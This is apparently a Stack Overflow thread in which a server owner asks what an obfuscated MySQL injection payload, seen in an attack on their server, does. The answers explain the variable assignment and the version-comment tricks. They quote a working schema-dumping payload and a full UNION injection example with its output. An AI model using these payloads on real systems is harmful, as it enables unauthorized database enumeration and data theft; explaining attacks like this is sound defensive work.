# Understanding SQL injection payload

Tags: sql-injection, mysql

My server was hit by the following SQL injection payload:-

```
((/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a))
```

What does (@) and (@:=0x00) stand for in this payload?

for standalone execution, the above payload must be executed as:-

select ((/*!12345sELecT*/(@)from(/*!12345sELecT*/(@:=0x00),(/*!12345sELecT*/(@)from(`InFoRMAtiON_sCHeMa`.`ColUMNs`)where(`TAblE_sCHemA`=DatAbAsE/*data*/())and(@)in(@:=CoNCat(@,0x3c62723e5461626c6520466f756e64203a20,TaBLe_nAMe,0x3a3a,column_name))))a));

The payload had the syntax error.

Answer (score 29, accepted):

> What does (@) and (@:=0x00) stand for in this payload?

- `@` - is the variable name
- `@:=0x00` - is the assignment of zero into this variable.

Note: `:=` is the [assignment-operator](https://dev.mysql.com/doc/refman/5.7/en/assignment-operators.html#operator_assign-value)

**Thanks for @Frank Cedeno and @strnk for their Q&A in the comments.**

> @Frank Cedeno - How /*!12345sELecT*/ becomes select?
>
> @strnk - This is a [MySQL-specific extension to SQL comments](https://dev.mysql.com/doc/refman/5.7/en/comments.html), the `sELecT` is only included in the query if the server version is greater or equal to 12345 (1.23.45), so it filters-out non-MySQL servers

**More Info:**

From [websec sql_injection](https://websec.ca/kb/sql_injection):

**Retrieving Multiple Tables/Columns at once**

```
SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x
```

Example:

```
SELECT * FROM Users WHERE id = '-1' UNION SELECT 1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' > ',column_name))))x), 4--+';
```

Output:

```
[ information_schema ] >CHARACTER_SETS > CHARACTER_SET_NAME
[ information_schema ] >CHARACTER_SETS > DEFAULT_COLLATE_NAME
[ information_schema ] >CHARACTER_SETS > DESCRIPTION
[ information_schema ] >CHARACTER_SETS > MAXLEN
[ information_schema ] >COLLATIONS > COLLATION_NAME
[ information_schema ] >COLLATIONS > CHARACTER_SET_NAME
[ information_schema ] >COLLATIONS > ID
[ information_schema ] >COLLATIONS > IS_DEFAULT
[ information_schema ] >COLLATIONS > IS_COMPILED
```

[This Stackoverflow answer](https://stackoverflow.com/a/27356129/5088142) explains the SQL code:

> First of all i would make the query a litte bit more readable by
>   reformatting it:
>
> ```
> 1) SELECT (SELECT (@)
> 2)         FROM (SELECT (@:=0x00),
> 3)                      (SELECT (@)
> 4)                       FROM (information_schema.columns)
> 5)                       WHERE (table_schema >= @)
> 6)                       AND   (@) IN (@:=CONCAT(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))
> 7)                       )
> 8)               )
> 9)        a);
> ```
>
> The assignment of @ is as follows:
>
> 1. In Line 3 it gets the value 0x00 (Decimal: 0)
> 2. In line 5 this value is used for the greater than (table_schema >= 0)
> 3. Line 6 is a way to concat each schema, table and column name into @
> 4. @ is returned in line 1 and contains a concatenated list of your structures
>
> In line 6 an additional `<br>` (0x3C,0x62,0x72,0x3E) is added to the
>   variable to make the output more readable

Comment: Extremely fascinating.  Can you explain how /*!12345sELecT*/ becomes select?.

Comment: This is a [MySQL-specific extension to SQL comments](https://dev.mysql.com/doc/refman/5.7/en/comments.html), the "sELecT" is only included in the query if the server version is greater or equal to 12345 (1.23.45), so it filters-out non-MySQL servers.